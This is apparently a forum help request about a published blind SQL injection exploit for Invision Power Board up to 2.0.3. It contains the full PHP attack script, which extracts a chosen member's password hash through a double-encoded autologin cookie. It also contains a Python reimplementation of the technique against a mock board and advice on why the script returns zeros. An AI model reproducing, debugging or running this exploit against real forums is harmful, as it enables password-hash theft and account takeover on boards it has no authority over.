
IPB exploit - can't get it work


ghost

I found this exploit for Invision Power Board. It should work up to version 2.0.3. So I installed a test forum (version 2.0.3) on my localhost, but I can't get it to work.

  • First of all, has anybody got it to work?
  • Second, I tried to use this script (of course I corrected the server and file variables); it didn't work, I just get 0s as the result.
  • Is there maybe a problem with the user id (I have 2 users on my test forum; I changed the id variable to 1)? That didn't work either.

Any ideas?

```php
<?php
/*
Invision Power Board: blind SQL injection through the autologin cookie
<= 2.0.3
<= 1.3.1 Final
/str0ke
*/

$server = "SERVER";
$port = 80;
$file = "PATH";   /* "index.php?..." is appended to this, so it needs a trailing slash */

/* id of the member whose password hash is extracted */
$target = 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";

$hash = "";
$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
  $idx = 0;
  $found = false;

  while( !($found) ) {
    if( $idx >= strlen($hex) ) {
      die("\nNo hex digit matched at position $i: wrong target id, or the board never answered with a non-redirect\n");
    }
    $letter = substr($hex, $idx, 1);

    /* %2527 is urldecoded once by PHP to %27, which contains no quote for
       magic quotes to escape; the board's own urldecode then turns it into '. */
    $cookie ="member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
    $cookie .="%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;

    /* Query is in effect: SELECT * FROM ibf_members
        WHERE id=$id AND password='$pass' OR id=$target
        HAVING id=$target AND MID(`password`,$i,1)='$letter' */

    $header = getHeader($server, $port, $file . "index.php?act=Login&CODE=autologin", $cookie);
    if( $header === "Unknown" ) {
      die("\nCould not connect to $server:$port\n");
    }

    /* A redirect back to the login form means no row matched, i.e. a wrong
       letter. Anything else counts as a hit, so a 404 or an error page (wrong
       path, board not installed there) would read as '0' for every position. */
    if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/', $header) ) {
      echo $i . ": " . $letter . "\n";
      $found = true;

      $hash .= $letter;
    } else {
      $idx++;
    }
  }
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
  $ip = gethostbyname($server);
  $fp = fsockopen($ip, $port);

  if (!$fp) {
      return "Unknown";
  }

  $com = "HEAD $file HTTP/1.1\r\n";
  $com .= "Host: $server:$port\r\n";
  $com .= "Cookie: $cookie\r\n";
  $com .= "Connection: close\r\n";
  $com .= "\r\n";

  fputs($fp, $com);

  /* Read until the blank line that ends the headers; also stop at EOF so a
     short or closed response cannot spin forever. */
  $header = "";
  do {
      $header .= fread($fp, 512);
  } while( !feof($fp) && !preg_match('/\r\n\r\n$/', $header) );
  fclose($fp);

  return $header;
}
?>
```
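To see why the probe cookie works and how the redirect check turns into a hash, here is an added, self-contained Python model of the technique (my own example, not code from the post, from str0ke or from IPB). It replays the server-side decode chain the script relies on (PHP urldecodes the cookie, magic quotes escapes it, the board urldecodes it again), interpolates the cookie into the same query shape, runs it against a constructed ibf_members table in sqlite, and drives the page's redirect-or-not oracle. Assumptions: the member ids and md5 hashes are made up; MID() and a GROUP BY-less HAVING are MySQL-isms, so the mock rewrites them to substr() and AND, which for this query is equivalent.

```python
import hashlib
import re
import sqlite3
from urllib.parse import unquote

HEX = "0123456789abcdef"
# Same test the posted script applies to the HEAD response headers.
LOGIN_REDIRECT = re.compile(r"Location:(.*)act=Login&CODE=00\r\n")

# Constructed stand-in for ibf_members: (id, name, md5 password hash). The
# ids and passwords are made up for this example.
SAMPLE_MEMBERS = [
    (1, "admin", hashlib.md5(b"password").hexdigest()),
    (81, "victim", hashlib.md5(b"test").hexdigest()),
]


def addslashes(value):
    """What magic_quotes_gpc did to every incoming cookie value."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def cookie_value_as_seen_by_ipb(raw):
    """Server-side decode chain: PHP urldecodes the cookie once, magic quotes
    escapes it, then the board urldecodes it again before building SQL.
    A single-encoded %27 gets escaped; the double-encoded %2527 does not."""
    return unquote(addslashes(unquote(raw)))


class MockBoard:
    """Minimal model of the vulnerable autologin handler, backed by sqlite."""

    def __init__(self, members):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE ibf_members (id INTEGER, name TEXT, password TEXT)")
        self.db.executemany("INSERT INTO ibf_members VALUES (?, ?, ?)", members)

    def autologin(self, cookie_header):
        cookies = dict(part.split("=", 1) for part in cookie_header.split(";"))
        member_id = cookie_value_as_seen_by_ipb(cookies["member_id"])
        pass_hash = cookie_value_as_seen_by_ipb(cookies["pass_hash"])
        # Unparameterised interpolation: the flaw the probe cookie abuses.
        sql = f"SELECT * FROM ibf_members WHERE id={member_id} AND password='{pass_hash}'"
        # sqlite lacks MID() and (before 3.39) HAVING without GROUP BY. MySQL
        # applies such a HAVING to the selected rows, so for this query it is
        # just another conjunct; the rewrite keeps the semantics.
        portable = sql.replace("MID(", "substr(").replace(" HAVING ", " AND ")
        rows = self.db.execute(portable).fetchall()
        if not rows:
            return "HTTP/1.1 302 Found\r\nLocation: index.php?act=Login&CODE=00\r\n\r\n"
        return "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"


def probe_cookie(target, pos, letter, fake_id=10, fake_pass=""):
    """The cookie the posted script sends for one (position, digit) guess."""
    return (f"member_id={fake_id};pass_hash={fake_pass}%2527%20OR%20id={target}"
            f"%20HAVING%20id={target}%20AND%20MID(`password`,{pos},1)=%2527{letter}")


def extract_hash(autologin, target, length=32):
    """Boolean-blind extraction: a redirect to the login page means no row
    matched, so the guessed digit was wrong; anything else is taken as a hit."""
    recovered = ""
    for pos in range(1, length + 1):
        for letter in HEX:
            if not LOGIN_REDIRECT.search(autologin(probe_cookie(target, pos, letter))):
                recovered += letter
                break
        else:
            # Every digit redirected: the target row does not exist. The posted
            # script never checks this and would keep guessing forever.
            raise RuntimeError(f"no hex digit matched at position {pos}")
    return recovered


if __name__ == "__main__":
    board = MockBoard(SAMPLE_MEMBERS)
    print(extract_hash(board.autologin, 81))
```

Two failure modes are worth keeping in mind when running the real script against a test install: if the target id has no row, every probe redirects and nothing is ever found; if the request never reaches the board's autologin code (wrong path, connection refused, an error page), no response carries the login redirect, so every position is "found" at the first digit and the output is a string of 0s.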